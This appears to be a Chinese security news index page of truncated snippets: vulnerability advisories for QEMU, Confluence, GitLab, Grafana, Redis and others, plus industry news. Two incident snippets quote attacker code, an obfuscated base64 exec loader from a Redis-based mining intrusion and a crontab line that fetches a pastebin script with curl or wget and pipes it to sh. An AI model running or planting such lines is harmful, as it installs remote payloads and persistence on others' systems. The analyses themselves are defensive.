漏洞描述 QEMU 是开源的通用模拟器和虚拟机，virtio-crypto 是 QEMU 中提供的虚拟加密设备。 QEMU 受影响版本中，在 virtio_crypto_handle_sym_req () 处理数据对称加解密请求时，由于 virtio_crypto_sym_op_helper () 中未校验 src_len 和 dst_len 的值，当...

云计算巨头亚马逊 AWS 宣布将从明年开始对 IPv4 公网地址收费，鼓励用户使用 IPv6 地址。原因是 IPv4 地址日益稀缺，获取的成本在增加。 从 2024 年 2 月 1 日开始，对于所有 IPv4 公网地址，AWS 将对每个地址每小时收 $0.005（每个 IP 每小时 0.005 美元），...

漏洞描述 Confluence 是由 Atlassian 开发的知识管理与协同软件，通常在企业内部用作 wiki 系统。 Confluence 7.19.8 到 8.2.0 之前的版本中存在远程代码执行漏洞，具有登录权限的攻击者无需用户交互即可在 Confluence 服务器中执行任意命令。 漏洞类型 代码...

Amazon Web Services (AWS) 在北美开源峰会上宣布，开源 Cedar 和SnapChange 两个项目；旨在解决围绕软件供应链安全的问题。AWS 开源营销总监 David Nalley表示，这两个项目都是 AWS 为开源社区贡献知识产权的持续努力的一部分。 根据介绍，Cedar 是一种将权...

漏洞描述 GitLab 是一款基于 Git 的代码托管、版本控制、协作开发平台。 GitLab CE/EE 15.4 至 15.9.6 版本，15.10 至 15.10.5 版本和 15.11 至 15.11.1 版本存在代码执行漏洞。在某些条件下，实例上的任何 GitLab 用户都可以使用 GraphQL 端点将恶意运行程...

漏洞描述 VMware Aria Operations for Logs 前身是 vRealize Log Insight，VMware 用于处理和管理大规模的日志数据产品。 VMware Aria Operations for Logs 8.10.2 版本中存在反序列化漏洞，具有 VMware Aria Operations for Logs 网络访问权限的未经身份验...

漏洞描述 GitLab 是一个基于 Git 的代码托管和协作平台。 GitLab EE/CE 从 11.5 到 15.8.5、从 15.9 到 15.9.4，以及从 15.10 到 15.10.1 版本中存在信息泄露漏洞，具有管理员权限的攻击者可以利用该漏洞获取仓库 (repository) 镜像配置中的密码。 漏洞名称...

漏洞描述 mod_auth_openidc 是 Apache 2.x HTTP 服务器的身份验证和授权模块，实现了 OpenID Connect Relying Party 单点登录功能，OIDCStripCookies 用于从 OpenID Connect 授权令牌中移除指定的 Cookie。 mod_auth_openidc 受影响版本中由于 mod_auth_open...

漏洞描述 Redis 是一个开源的、可基于内存、分布式、可选持久性的键值对 (Key-Value) 存储数据库，Redis Msetnx 命令用于当给定 key 不存在时同时设置一个或多个 key-value 对。 受影响版本中当 MSETNX 命令中两次使用相同的键将触发断言，通过 Redis 身份认...

根据《纽约时报》的报道，一份法律文件显示，Twitter 称其部分源代码在网上被泄露，该公司已于上周五采取行动，它通过向托管代码的 GitHub 发送版权侵权通知，删除了被泄露的代码。 文件显示 Twitter 还要求美国加利福尼亚州北区地方法院 命令 GitHub 识别共...

2021年12月7日，阿里云应急响应中心监测到 CVE-2021-43798Grafana plugin 任意文件读取漏洞。 漏洞描述 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后，Grafana可以在网络浏览器里显示数据图表和警告。2021年12月6日，...

0x01 漏洞描述 Grafana 是 Grafana 实验室的一套提供可视化监控界面的开源监控工具。该工具主要用于监控和分析 Graphite、InfluxDB 和 Prometheus 等。 Grafana 存在授权问题漏洞，该漏洞源于在受影响的版本中，未经身份验证和身份验证的用户都可以通过访问...

CeresDB 是一款高性能、分布式的云原生时序数据库，采用 Rust 编写。其开发团队近日宣布：经过近一年的开源研发工作，时序数据库 CeresDB 1.0 正式发布，达到生产可用标准。 CeresDB 1.0 官方中文文档：https://docs.ceresdb.io/cn/ CeresDB 1.0 核心特性介绍...

漏洞描述 Jenkins 是一款 Java 编写的集成工具。 该项目受影响版本存在存储型 XSS 漏洞。该漏洞是由于在呈现插件版本与 Jenkins plugin manager 版本不兼容的错误信息时没有进行转义。 攻击者可向 Jenkins 实例中配置的更新站点提供插件，当 Jenkins 实例加...

漏洞描述 GitLab 是由 GitLab 公司开发的、基于 Git 的集成软件开发平台。 在受影响版本内，攻击者可以将精心制作的 CI job 组件打成 zip 文件上传到子项目中，导致 sidekiq 「异步执行」job 分配大量内存，从而导致拒绝服务。 漏洞名称 GitLab 存在拒绝服务...

漏洞描述 GitLab 是由 GitLab 公司开发的、基于 Git 的集成软件开发平台。 GitLab 的受影响版本中存在的开放重定向漏洞，攻击者可利用此漏洞诱导用户点击可信的 url 将用户重定向到恶意网址，进而窃取用户凭据或其它敏感信息。 漏洞名称 GitLab 存在开放重定...

漏洞描述 Grafana 是一个跨平台、开源的数据可视化网络应用平台。 Grafana 的受影响版本中存在敏感信息泄露漏洞，原因是在登录页面使用忘记密码时，平台会向 /api/user/password/sent-reset-email 发送一个 Post 请求，如果用户名或电子邮件不存在时，JSON...

报告编号：B6-2021-122301 报告来源：360CERT 报告作者：360CERT 更新日期：2021-12-23 漏洞简述 2021年12月23日，360CERT监测发现Apache官方发布了安全通告 ，修复了多个漏洞，其中包含的漏洞编号有：CVE-2021-44224、CVE-2021-44790，漏洞等级：高危，漏洞...

0x01 攻击方式 利用的是通用漏洞入侵服务器并获得相关权限，从而植入挖矿程序再进行隐藏。 通过对脚本的分析，发现黑客主要是利用Redis未授权访问漏洞进行入侵。脚本里有个python函数。 import base64;exec(base64.b64decode(I2NvZGluZzogdXRmLTgKaW1wb3J0IH...

以太坊矿工强烈反对变革，威胁发动 51% 攻击 以太坊创始人 Vitalik Buterin 强力推动的新提案 EIP-1559 被认为将让整个以太坊生态系统受益，但代价是大幅减少矿工们的收入，因此遭到了部分矿工们的强烈反对。而大型矿池由于有大量的 ETH 储蓄，因此可以从该...

近日，Python 软件基金会（PSF）释出 Python3.8.8 和 3.9.2 版本，该版本主要修复了两个值得注意的安全漏洞，其中一个名为CVE-2021-3177的漏洞容易被攻击者远程利用，基于代码执行可让计算机脱机。 乍一看，让计算机脱机并不是什么大事，不过，倘若真的被有...

Google 于 2 月 5 日发布了针对 Windows、Mac 和 Linux 用户的 Chrome 小版本更新，更新后 Chrome 的版本号来到了 88.0.4324.150。在这个版本中 Google 解决了一个已被利用的零日安全漏洞（zero-day vulnerability）。 这个被 Google 评定为高度严重的漏洞被...

Redis Centos镜像漏洞修复以及升级内核版本 linux内核介绍：https://www.cnblogs.com/still-smile/p/11597620.html redis当前所有的Centos镜像默认自带的ssh 版本过低，所以会出现以下漏洞。 1 OpenSSH 命令注入漏洞(CVE-2020-15778) 2 OpenSSH 安全漏洞(CVE-...

安全公司 Kaspersky 日前 发现 了一个新的文件加密木马，它是 ELF 可执行文件，旨在对基于 Linux 的操作系统计算机上的数据进行加密。 Kaspersky 经过初步分析，发现遇到的实际是已知勒索软件 RansomEXX 的 Linux 构建版本。 RansomEXX 是年初开始活跃的一种...

Linux 内核现在已经增加了对 exFAT 的支持，同时它也没有放弃维护原有 FAT 文件系统驱动，甚至现在从邮件列表上看，FAT 性能方面可能会有大幅提升。 开发 Tux3 文件系统而闻名的 OGAWA Hirofumi 在邮件列表中提到了目前 Linux FAT 文件系统的预读取处理有瑕疵...

安全公司 Sophos 警告说，新的勒索软件攻击使用了易受攻击的技嘉驱动程序，试图闯入 Windows 系统，然后禁用正在运行的安全软件。该攻击基于 2018 年在技嘉驱动程序中发现的安全漏洞，该安全漏洞在 CVE-2018-19320 中有详细说明。 该驱动程序在技嘉确认该错误...

勒索软件将在 2020 年继续困扰组织，因为网络加密恶意软件攻击背后的网络罪犯几乎没有被抓住的风险。因此，对攻击者而言，风险很小，但潜在的回报却很大。 在过去的一年中，有许多勒索软件攻击的例子，已经有受害者屈服于攻击者的勒索要求，他们通常支付数十...

一. 症状及表现 CPU使用率异常高，外出流量异常 crontab异常，存在如下定时任务(基本上就可以确定了) [root@it.net.cn ~]# crontab -l */15 * * * * （curl -fsSL https://pastebin.com/raw/xmxHzu5P||wget -q -O- https://pastebin.com/raw/xmxHzu5P)|sh 在...